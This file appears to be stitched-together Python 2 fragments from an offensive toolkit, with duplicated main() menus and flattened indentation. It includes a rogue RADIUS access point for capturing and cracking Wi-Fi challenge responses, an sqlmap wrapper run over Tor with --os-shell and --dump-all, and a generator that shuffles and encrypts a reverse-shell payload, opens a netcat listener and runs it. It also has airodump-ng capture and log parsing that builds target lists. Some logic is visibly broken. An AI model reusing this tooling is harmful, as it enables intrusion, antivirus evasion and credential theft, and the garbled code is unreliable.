def main():
print """
\t#1. Start the FreeRADIUS server, the HostAPD access point, and Cylon-Raider
\t#2. EDIT the temporary hostapd configuration file
\t#3. DUMP logs for FreeRADIUS Wireless Pawn Edition
\t#4. CRACK the challenge response strings to find the password
### Alternative Commands ###
# 666. SETUP - Install the required components to conduct this attack
"""
opt_choice = int(raw_input(toolkits.yellow("Enter a OPTION: ")))
if opt_choice == 1:
start_radius_server()
main()
elif opt_choice == 2:
write_hostapd_conf()
main()
elif opt_choice == 3:
dump_challenge_response()
main()
elif opt_choice == 4:
crack_challenge_response()
main()
elif opt_choice == 666:
setup_freeradius()
main()
else:
print toolkits.red("You have entered a invalid option")
main()
return
def main():
print toolkits.cyan("""
\n\n\n
\t\tForeplay, EZ-Mode Armitage Teamserver Collaboration Menu
\n\t\t\t\tCOMMANDS\n
LAUNCH - Launch the Armitage Teamserver using NEW CREDENTIALS
LOAD - Load PREVIOUSLY SAVED CREDENTIALS and launch a teamserver from that
EXIT - Exit program
""")
opt_choice = str(raw_input(toolkits.yellow("Enter a COMMAND: ")))
if opt_choice == "LAUNCH":
collect_teamserver_creds(save_file)
main()
elif opt_choice == "LOAD":
load_saved_teamserver_creds(save_file)
main()
elif opt_choice == "EXIT":
print toolkits.red('Received exit command, exiting!')
exit(0)
else:
print toolkits.red(
'You have entered a invalid option, please try again')
main()
return
def main():
print toolkits.yellow("""
SQLMAP OPTIONS:
\tLIST: Get a database list of the target URL (or URLs)
\tEDIT: Edit the wordlist of targeted URLs
\tEXIT: Exit program
""")
opt_choice = str(raw_input(toolkits.yellow("Enter a COMMAND: ")))
if opt_choice == "LIST":
os.system('clear')
read_target_list(wordlist)
main()
elif opt_choice == "EDIT":
os.system('clear')
edit_wordlist()
main()
elif opt_choice == "EXIT":
exit(0)
else:
os.system('clear')
print toolkits.red("You have entered a invalid option")
main()
return
def main():
decryptKey = generateKey()
decryptIV = generateIV()
code = read_template()
template_reverse_shell
payloadNoEncrypt = template_reverse_shell.splitlines()
shuffledPayload = commandSegmentationTech(payloadNoEncrypt)
# writableLines = convertIntoLines(shuffledPayload)
l_encrypted = cryptor(shuffledPayload, decryptKey, decryptIV)
outfile = writeUniquePayload(code, l_encrypted, decryptKey, decryptIV)
print red("DEBUG: Shuffled payload\r\n{}".format(str(shuffledPayload)))
out = b64encode(l_encrypted)
print yellow("DEBUG: Encrypted payload\r\n{}".format(str(out)))
print green("DEBUG: Payload generated at\r\n{}".format(str(outfile)))
rp = open(outfile, 'rb+')
uniquePayload = rp.read()
print red("DEBUG: Contents of {}\r\n".format(str(outfile)))
print yellow(uniquePayload)
print cyan("Opening netcat session")
os.system("""gnome-terminal -e 'bash -c "nc -nvlp {}"'""".format(
str(LPORT)))
print green("You may run the payload with\r\npython {}".format(
str(outfile)))
time.sleep(2)
print green("Executing payload")
os.system("python {}".format(str(outfile)))
return
def reconstituteLine(shuffledLine,arrayMap):
cmd=""
print red("DEBUG: Shuffled Line to Reconstitute\r\n{}".format(shuffledLine))
print yellow("DEBUG: arrayMap to reconstitute the payload\r\n{}".format(arrayMap))
for indice in arrayMap:
cmd = "{}{}".format(str(cmd),str(shuffledLine[indice]))
print green("DEBUG: Reconstituted Command:\r\n{}".format(str(cmd)))
return cmd
def parse_fail2ban_snort_logs(default_target_list):
debug_str = "DEBUG: The default target list is {0}".format(
str(default_target_list))
print debug_str
# clears out the default target list
# WIPE_DEFAULT_target_list_cmd = "echo '' > {0}".format(str(default_target_list))
# os.system(WIPE_DEFAULT_target_list_cmd)
# output = ''
# bug solution. Python will not allow me to pass SHELL PIPE ARGUMENTS but I can still run the variables as arugments, and then store the output as a variable, and then write it to a document.
# starts off by parsing banned IPs in fail2ban logs
# https://stackoverflow.com/questions/20291543/cant-execute-shell-script-from-python-subprocess-permission-denied
# this link basically states that python is inadequate for nrunning shell commands
# next solution is a generate-a-script code which woulod be better because we can take advantage of specifying the command until bash for the better features.
INTERNAL_ip_addr = "*.*.*.*"
default_target_list = "/tmp/default_target_list.txt"
# generate exclude file generally assuming that everything in your /etc/hosts directory is something you want to exclude from the pentest
default_exclude_list = "/tmp/exclude_file.txt"
bash_command("""cat /etc/hosts | awk '{{print $1}}' > {0}""".format(
str(default_exclude_list)))
script_1_name = "./bash_parse_fail2ban.sh"
script_2_name = "./bash_parse_snort_logs.sh"
# bash_script = ''
# CMD_execute_bash = "/bin/bash {0}".format(str(bash_script))
#
# bash_script = script_1_name
# os.system(CMD_execute_bash)
# initial_scan(default_target_list)
bash_command(
"""cd /var/log;egrep -irh "Ban" fail2ban* --color | awk -F "NOTICE" '{ print $2 }' | uniq -c > banned-ips.txt && cat banned-ips.txt | awk '{ print $4 }' | strings > /tmp/default_target_list.txt"""
)
bash_command(
"""cd /var/log/snort;egrep -irh " -> *.*.*.*" * --color | sort -k 2 | awk -F "->" '{ print $1 $2 }'| awk -F " " '{ print $2 "|" $3 }' | awk -F ":" '{ print $1 }' >> /tmp/default_target_list.txt"""
)
bash_command("""cat /tmp/default_target_list.txt""")
print toolkits.red(
"DEBUG: Checking if the default target list is enumerated")
time.sleep(3)
initial_scan(default_target_list)
return default_target_list
def writeUniquePayload(code,
l_encrypted,
decryptKey,
decryptIV,
outfile=payload2):
cmd = "touch {}".format(str(outfile))
subprocess.call(cmd, shell=True, executable='/bin/bash')
out = b64encode(l_encrypted)
w = open(outfile, 'wb+')
for line in code:
print red(
"DEBUG: function=writeUniquePayload Type(code):\r\n{}".format(
str(type(code))))
print red(
"DEBUG: function=writeUniquePayload Type(line):\r\n{}".format(
str(type(line))))
if 'key=' in line:
kline = 'key="""{}"""'.format(str(decryptKey))
line = line.replace('key=', kline)
if 'iv=' in line:
ivline = 'iv="""{}"""'.format(str(decryptIV))
line = line.replace('iv=', ivline)
if 'pld=' in line:
pldline1 = 'pld=str("""'
pldline2 = "{}".format(str(out))
pldline3 = '""")'
pldline = """
{}
{}
{}
""".format(str(pldline1), str(pldline2), str(pldline3))
line = line.replace('pld=', pldline)
w.write('\r\n' + line)
w.close()
cmd = "ls $PWD/{}".format(str(outfile))
of = subprocess.Popen(cmd,
shell=True,
executable='/bin/bash',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
ofile = str(of.stdout.read().encode('utf-8')).strip().rstrip()
print "Payload saved at:\r\n{}".format(str(ofile))
return outfile
#!/usr/bin/env python
# coding=UTF-8
import os
import socket
import operator
import sys
import toolkits
os.chdir("/root/ArmsCommander/recon/sqlmap_improvement_project/")
wordlist = "/root/ArmsCommander/recon/sqlmap_improvement_project/target_list"
print toolkits.red("Starting up Tor Service")
os.system("gnome-terminal -e 'bash -c \"tor; exec bash\"'")
def get_db_list(target_str):
cmd_str = """sqlmap -u "{0}" -v 6 --tor --check-tor --level=5 --risk=3 --batch --dbs -a -b --dump-all --os-shell --os-pwn --random-agent
""".format(str(target_str))
print 'DEBUG: %s' % cmd_str
os.system(cmd_str.strip())
return
def read_target_list(wordlist):
list_of_strings = "{0}".format(str(wordlist))
r = open(list_of_strings, 'r')
# line = r.readline()
row_number = 1
def red(string):
string = toolkits.red(string)
print string
return string
def build_cmd_str_and_begin(target_search_regex, save_file, mon_mode_interface,
options_str):
cap_file_dir = '/root/Cylon-Raider-Lite/logs'
timestr = time.strftime("%Y%m%d-%H%M%S")
# append the regex string if entered
if target_search_regex != '':
# target_search_regex = '--essid-regex ' + target_search_regex
target_search_regex = """ --essid-regex "{0}" """.format(
str(target_search_regex))
# This bullshit here is the get TCPDUMP to run in the background
# but nothing works, even threading, so I tried to make it a popup
# DOesn't work either even though it should
capture_Interface = mon_mode_interface
# tcpdump_filename = cap_file_dir + 'tcpdump_monitor_mode_' + timestr + '.pcap'
# os.system("gnome-terminal -e 'bash -c \"python /root/Cylon-Raider-Lite/tcp_dump_background.py; exec bash\"'")
# module_name = '/root/Cylon-Raider-Lite/tcp_dump_background.py'
# cmd_str = """gnome-terminal -e 'bash -c \"python {0}; exec bash\"""".format(
# str(module_name)
# )
# os.system(cmd_str)
print toolkits.red('TCPDump executed')
# Working code, airodump-ng --band abg
cmd_str = "airodump-ng --band abg {0} {1} -a --write {2}/{3}_{5}_monitor_mode_capture.csv --write-interval 5 --output-format csv {4}".format(
str(options_str), str(target_search_regex), str(cap_file_dir),
str(timestr), str(mon_mode_interface), str(save_file))
print toolkits.red('Airodump-executed')
# need to fix format
cmd_str = cmd_str.strip()
print 'DEBUG: Command string = ' + cmd_str
# x = threading.Thread(name='subthread_hidden_ap_decloaker', target=subthread_hidden_ap_decloaker(mon_mode_interface))
# x.start()
# #y = threading.Thread(name='subthread_tcp_dump', target=subthread_tcp_dump(mon_mode_interface))
# y.start()
os.system(
"gnome-terminal -e 'bash -c \"python /root/Cylon-Raider-Lite/sniffHidden.py; exec bash\"'"
)
os.system(
"gnome-terminal -e 'bash -c \"tcpdump & -w filename.pcap -i wlan1mon; exec bash\"'"
)
os.system(cmd_str)
# dont forget channel
# x = threading.Thread(name='subthread_hidden_ap_decloaker', target=subthread_hidden_ap_decloaker(mon_mode_interface))
# x.start()
#y = threading.Thread(name='subthread_tcp_dump', target=subthread_tcp_dump(mon_mode_interface))
# y.start()
if KeyboardInterrupt:
stop_mon_mode_str = "airmon-ng stop %s" % str(mon_mode_interface)
#os.system('airmon-ng check kill')
os.system('killall tcpdump')
os.system(stop_mon_mode_str)
os.system(
'cat /root/Cylon-Raider-Lite/logs/*.csv > /sdcard/Cylon_Raider_Recon.txt'
)
os.system(
'cat /root/Cylon-Raider-Lite/logs/*.csv >/root/Cylon_Raider_Recon.txt'
)
# x.terminate()
return
